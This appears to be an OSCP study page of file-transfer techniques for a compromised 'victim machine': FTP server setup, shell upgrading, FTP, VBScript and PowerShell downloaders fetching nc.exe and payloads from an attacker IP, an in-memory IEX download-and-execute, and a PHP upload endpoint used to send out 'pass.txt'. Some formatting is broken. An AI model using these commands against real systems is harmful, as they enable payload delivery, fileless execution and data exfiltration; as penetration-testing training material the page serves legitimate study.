Ahmed.Attia

49 File Transfer | Offensive Security Certified Professional

Transferring files to and from the victim machine, also how to upgrade your netcat shell to interactive shell.
There are no comments to display.

Media information

Album
OSCP
Added by
Ahmed.Attia
Date added
View count
738
Comment count
0
Rating
0.00 star(s) 0 ratings

Caption

# Installing ftpd
Code:
sudo apt update && sudo apt install pure-ftpd
FTP configurations.
Code:
#!/bin/bash
if [[ $(/usr/bin/id -u) -ne 0 ]]; then
    echo "Not running as root"
    exit
fi
sudo apt update && sudo apt install pure-ftpd
sudo groupadd ftpgroup
sudo useradd -g ftpgroup -d /dev/null -s /etc ftpuser
sudo pure-pw useradd limbo -u ftpuser -d /ftphome
sudo pure-pw mkdb
cd /etc/pure-ftpd/auth/
sudo ln -s ../conf/PureDB 60pdb
sudo mkdir -p /ftphome
sudo chown -R ftpuser:ftpgroup /ftphome/
sudo systemctl restart pure-ftpd

Upgrading the shell
Code:
python -c 'import pty; pty.spawn("/bin/bash")'

#using arrows

#Ctrl + z
stty raw -echo
fg
FTPd file commands
Code:
echo open 192.168.1.8> ftp.txt
echo USER limbo> ftp.txt
echo limbo> ftp.txt
echo bin> ftp.txt
echo GET nc.exe> ftp.txt
echo bye> ftp.txt
#How to run it
Code:
ftp -v -n -s:ftp.txt
#Fixing time out problem
Code:
echo "40110 40210" | sudo tee /etc/pure-ftpd/conf/PassivePortRange
sudo service pure-ftpd restart
VBScript to download files
Code:
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
[CODE]
#How to run it 
[code]
cscript wget.vbs http://192.168.1.8/evil.txt evil.txt
#Power shell commands to download files
Code:
echo $webclient = New-Object System.Net.WebClient >>wget.ps1 
echo $url = "http://192.168.1.8/evil2.txt" >>wget.ps1 
echo $file = "evil2.txt" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
[code]
#How to run it 
[code]
powershell -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
[code]

#Powersehll In one line 
[code]
powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.8/evil2.txt', 'evil2-2.txt')
[code]

#On Fly command  --> Run powershell script without downloading it on the hard disk
[code]
powershell IEX (New-Object System.Net.WebClient).DownloadString('http://192.168.1.8/hello.ps1')
[code]


#Uploading files 
#Preparing kali upload direcotry 

[code]
sudo mkdir /var/www/uploads
sudo chown www-data: /var/www/uploads
#Save this php code into /var/www/html/
PHP:
<?php
$uploaddir = '/var/www/uploads/';
$uploadfile = $uploaddir . $_FILES['file']['name'];
move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile) ?>
# THis is how to use it
Code:
powershell (New-Object System.Net.WebClient).UploadFile('http://192.168.1.8/upload.php', 'pass.txt')

Share this media

Top